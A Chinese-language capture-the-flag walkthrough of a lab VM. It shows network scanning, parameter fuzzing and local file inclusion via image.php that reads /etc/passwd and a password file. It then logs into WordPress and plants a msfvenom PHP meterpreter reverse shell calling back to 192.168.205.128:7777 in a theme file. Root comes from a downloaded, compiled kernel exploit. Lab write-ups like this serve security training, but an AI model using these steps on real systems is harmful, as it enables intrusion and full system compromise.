信息收集

确定主机位置

$ sudo nmap -sn 192.168.205.0/24                                          
[sudo] kali 的密码：
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:49 EDT
Nmap scan report for 192.168.205.1 (192.168.205.1)
Host is up (0.00058s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.205.2 (192.168.205.2)
Host is up (0.00014s latency).
MAC Address: 00:50:56:F7:4F:9C (VMware)
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00039s latency).
MAC Address: 00:0C:29:32:80:FE (VMware)
Nmap scan report for 192.168.205.254 (192.168.205.254)
Host is up (0.00029s latency).
MAC Address: 00:50:56:FD:69:37 (VMware)
Nmap scan report for 192.168.205.128 (192.168.205.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

$ sudo arp-scan -l              
Interface: eth0, type: EN10MB, MAC: 00:0c:29:e7:49:b2, IPv4: 192.168.205.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1   00:50:56:c0:00:01       VMware, Inc.
192.168.205.2   00:50:56:f7:4f:9c       VMware, Inc.
192.168.205.137 00:0c:29:32:80:fe       VMware, Inc.
192.168.205.254 00:50:56:fd:69:37       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 4 responded

确定137是我们的目标主机

首先进行tcp扫描然后保存

sudo nmap -sT --min-rate 10000 -p- 192.168.205.137 -oA nmapscan/tcp
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:53 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:32:80:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

发现两个端口打开这里为了保持好习惯假设碰上多个端口的话（只是进行练习）

grep open nmapscan/tcp.nmap|awk -F'/' '{print($1)}'|paste -sd ","

22,80

对这个连个端口进行全面扫描

sudo nmap -sT -sV -sC -O -p22,80 192.168.205.137 -oA nmapscan/web                        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:57 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00092s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:32:80:FE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds

于此同时发现对udp端口进行扫描

$ sudo nmap -sU --top-ports 20 192.168.205.137 -oA nmapscan/udp
[sudo] kali 的密码：
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 07:59 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00086s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   open|filtered ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:32:80:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.42 seconds

631/udp open|filtered ipp

68/udp open|filtered dhcpc

发现可能打开的两个端口

用脚本扫描端口漏洞于此同时对打开的80端口进行目录扫描

$ sudo nmap --script=vuln -p80,22 192.168.205.137 -oA nmapscan/vuln   
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 08:04 EDT
Nmap scan report for 192.168.205.137 (192.168.205.137)
Host is up (0.00042s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
MAC Address: 00:0C:29:32:80:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 174.19 seconds

目录扫描结果

[08:06:03] 200 - 131B - /dev
[08:06:06] 200 - 137B - /image.php

[08:06:18] 200 - 1KB - /wordpress/wp-login.php
[08:06:18] 200 - 4KB - /wordpress/

首先访问下/dev

$ sudo curl 192.168.205.137/dev
hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking.

一些提示告诉我们要使用工具来对web进行渗透

那么我们进一步对web进行web看有没文件遗留

这里使用dirb

sudo dirb http://192.168.205.137 -X .zip,.txt -o nmapscan

-----------------

DIRB v2.22    

By The Dark Raver
-----------------

OUTPUT_FILE: nmapscan/file
START_TIME: Mon Mar 31 08:36:15 2025
URL_BASE: http://192.168.205.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]

-----------------

GENERATED WORDS: 4612                                        

---- Scanning URL: http://192.168.205.137/ ----

+ http://192.168.205.137/secret.txt (CODE:200|SIZE:412)      
                                                             

-----------------

END_TIME: Mon Mar 31 08:36:21 2025
DOWNLOADED: 9224 - FOUND: 1

可以看到有新的结果

sudo curl 192.168.205.137/secret.txt
Looks like you have got some secrets.

Ok I just want to do some help to you. 

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web



//see the location.txt and you will get your next move//

根据提示对已经找到的php进行fuzz,

那继续dirb找php

sudo dirb http://192.168.205.137 -X .php -o nmapscan/file

-----------------

DIRB v2.22    

By The Dark Raver
-----------------

OUTPUT_FILE: nmapscan/file
START_TIME: Mon Mar 31 08:48:03 2025
URL_BASE: http://192.168.205.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

                                                             GENERATED WORDS: 4612

---- Scanning URL: http://192.168.205.137/ ----
                                                             + http://192.168.205.137/image.php (CODE:200|SIZE:147)      

+ http://192.168.205.137/index.php (CODE:200|SIZE:136)      
                                                                               

-----------------

END_TIME: Mon Mar 31 08:48:06 2025
DOWNLOADED: 4612 - FOUND: 2

对index.php进行fuzz

发现file

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.205.137/index.php?FUZZ=something
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************

* Wfuzz 3.1.0 - The Web Fuzzer                         *

********************************************************

Target: http://192.168.205.137/index.php?FUZZ=something
Total requests: 951

=====================================================================

ID           Response   Lines    Word       Chars       Payload                                                     
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"                                                      

Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0

sudo curl http://192.168.205.137/index.php?file                                                                                 
<html>

<title>HacknPentest</title>

<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

Do something better <br><br><br><br><br><br>you are digging wrong file</html>

提示我们挖的文件错误

根据上面的提示我们需要访问location.txt

$ sudo curl http://192.168.205.137/index.php?file=location.txt
<html>

<title>HacknPentest</title>

<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>

Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

告诉我们在其他php文件中用参数secrettier360进行测试

访问之前的image.php试试把

 sudo curl http://192.168.205.137/image.php?secrettier360=
<html>

<title>HacknPentest</title>

<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>

http://192.168.205.137/image.php?secrettier360=/etc/passwd

可以发现这个参数存在文件包含

可以看到一个root用户和一个victor用户应该是可以利用的

同时发现

saket:x:1001:1001:find password.txt file in my directory:/home/saket:

http://192.168.205.137/image.php?secrettier360=/home/saket/password.txt

follow_the_ippsec

应该是密码我们用ssh尝试登录victor

好吧不是

试一试wordpress的登录页面

成功！

victor:follow_the_ippsec

登录到后台

发现版本号WordPress 6.7.2

查看漏洞利用

在主题这里的secret.php是可以进行上传shell的

我们用

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.205.128 LPORT=7777 -o mshell.php

生成shell 然后把里面内容传到secret.php里面

msfconsole进行反弹shell

sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc

cd
cd /home
ls
saket
victor
cd saket 
ls
enc
password.txt
user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456

现获得一个flag

uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 G

查看内核发现内核版本比较低看能否进行内核提权

msfconsole下载45010 然后本地起一个http服务

靶机这边可以利用wget 进行下载需要到靶机里面进行编译然后即可成功提权

cat root.txt
b2b17036da1de94cfb024540a8e7075a